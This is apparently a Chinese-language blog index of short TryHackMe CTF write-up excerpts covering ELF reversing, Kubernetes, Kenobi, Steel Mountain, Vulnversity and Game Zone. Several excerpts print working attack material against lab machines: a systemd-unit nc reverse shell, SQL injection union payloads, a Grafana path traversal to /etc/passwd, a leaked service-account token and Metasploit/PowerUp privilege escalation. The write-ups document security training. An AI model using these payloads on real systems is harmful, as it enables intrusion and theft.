MoonlitSyntax

Reversing ELF
Reversing ELF
发表于 | TryHackMe
你你你 好玩,爱玩 gdb crackme4info functionsb *0x0000000000400520 #打断点run testinfo registersx/s 0x7fffffffe990 #上一步查看寄存器,这一步查看此处寄存器的值 好玩,爱玩
0day
0day
发表于 | TryHackMe
逆天rabbithole rsa解不出来,假的 这下是敏锐直觉了,Shellshock gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi 指定后缀 test.cgi看了一下,好老的洞啊 牛的 gcc -static poc.c -o poc 静态编译吧,然后说找不到cc1, find一下cc1的位置,然后把环境变量导进去,基础知识学到了
ColddBox
ColddBox
发表于 | TryHackMe
wpscan --url http://10.10.101.23 -e vp,vt,u 逆天 垃圾靶场,没意思的
Git Happens
Git Happens
发表于 | TryHackMe
纯送,我就知道,git log 唉,花几个小时去学一下git就好
Island Orchestration
Island Orchestration
发表于 | TryHackMe
靶机有问题,看看别人怎么写的 kali@kali:~$ sudo nmap -v10 -sC -sV -p22,80 -oA nse 10.10.158.170PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack ttl 60 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 3072 9f:ae:04:9e:f0:75:ed:b7:39:80:a0:d8:7f:bd:61:06 (RSA)| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCpKksU81PRNTKP1wxKXB9jq0Yk6id6JCuj4gYTAPk932sjBdUV4OhoMBP1m2cITHGWBWiE02KzRSkgL9X0FZL6CJRxo09N2uHXp6XT5+V+VMf1/5B1xgETNdpqgltDpqYudiKpNQzRpkvvtvCntDr ...
Kubernetes for Everyone
Kubernetes for Everyone
发表于 | TryHackMe
启动启动 public/plugins/alertlist/../../../../../../../../../../etc/passwd 目录遍历攻击,grafana的默认配置文件在哪呢 /etc/grafana/grafana.ini 没什么东西,看main.css 里面有OZQWO4TBNZ2A====b32解密得到 vagrant 猜测是ssh的账号 密码是hereiamatctf907 有点莫名奇妙 是个k0s k0s kubectl get secret k0s kubectl describe secret default-token-nhwb5 ====ca.crt: 1103 bytesnamespace: 7 bytestoken: eyJhbGciOiJSUzI1NiIsImtpZCI6IjloanZwZEh2a1pRTlY1Tk1uSHo3RnJnaEt1alE2a2NCNGowOWtNb0ktSE0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby ...
Virtualization and Containers
Virtualization and Containers
发表于 | TryHackMe
k8s启动 minikube start 开启全部集群kubectl get pods -A 搜索pod个数kubectl get nodes 列出集群中所有节点kubectl get namespaces 列出所有命名空间kubectl config view 查看配置kubectl config current-context 当前上下文kubectl config use-context <context-name> 切换指定上下文kubectl get deployment 查看 Kubernetes 集群中的 Deployment 资源kubectl get servicekubectl get rs 副本集相关信息kubectl delete deployment hello-tryhackme 删除部署kubectl apply -f <file.yaml> 应用一个或多个 YAML 配置文件来创建或更新资源kubectl describe <resource> <name>如kubectl describe pod < ...
Pentesting Fundamentals
Pentesting Fundamentals
发表于 | TryHackMe
介绍介绍 Rules of Engagement 交战规则
Kenobi
Kenobi
发表于 | TryHackMe
枚举SMB enum4linux -a 10.10.202.59smbclient -L \\10.10.202.59smbclient //10.10.202.59/anonymous 拿下来一个log.txt cat log.txt Generating public/private rsa key pair.Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): Created directory '/home/kenobi/.ssh'.Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kenobi/.ssh/id_rsa.Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.The key fingerpr ...
Steel Mountain
Steel Mountain
发表于 | TryHackMe
8080有hfs CVE-2014-6287 用msf windows/http/rejetto_hfs_exec 一把子嗦了 search -f *.txt 额 接下来用脚本 wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1Upload PowerUp.ps1load powershellpowershell_shell//进入powershell模式. .\PowerUp.ps1Invoke-AllChecks ServiceName : AdvancedSystemCareService9Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exeModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendDat ...
Vulnversity
Vulnversity
发表于 | TryHackMe
前面是常规的文件上传 phtml绕过后缀检测 后面是个suid提权 systemctl echo '[Service]Type=oneshotExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"[Install]WantedBy=multi-user.target' > $TB不好写,用catTF=$(mktemp).servicecat > 1.txt << EOF[Service]Type=oneshotExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"[Install]WantedBy=multi-user.targetEOFcat 1.txt > $TFsystemctl ...
Game Zone
Game Zone
发表于 | TryHackMe
万能密码登录额 ' or 1=1 -- - 好久没打了都忘了这是可以说的吗( searchitem=' union select 1,2,(SELECT group_concat(schema_name) FROM information_schema.schemata) -- -searchitem=' union select 1,2,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'db') -- -searchitem=' union select 1,2,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'db' AND table_name = 'users') -- - 直接看user吧 pwd ssh上去 查看套接字ss -tulpn N ...
avatar
dionysus
我醉欲眠卿且去
文章
306
标签
10
分类
8
此心安处
公告
最新文章
离开贴吧
离开贴吧
有点难受
有点难受
梦
复习一下反序列化 cc1-cc7
复习一下反序列化 cc1-cc7
Fastjson
Fastjson
分类
标签
awdMacwebtoolsjavanodejspython审计sqlxss
归档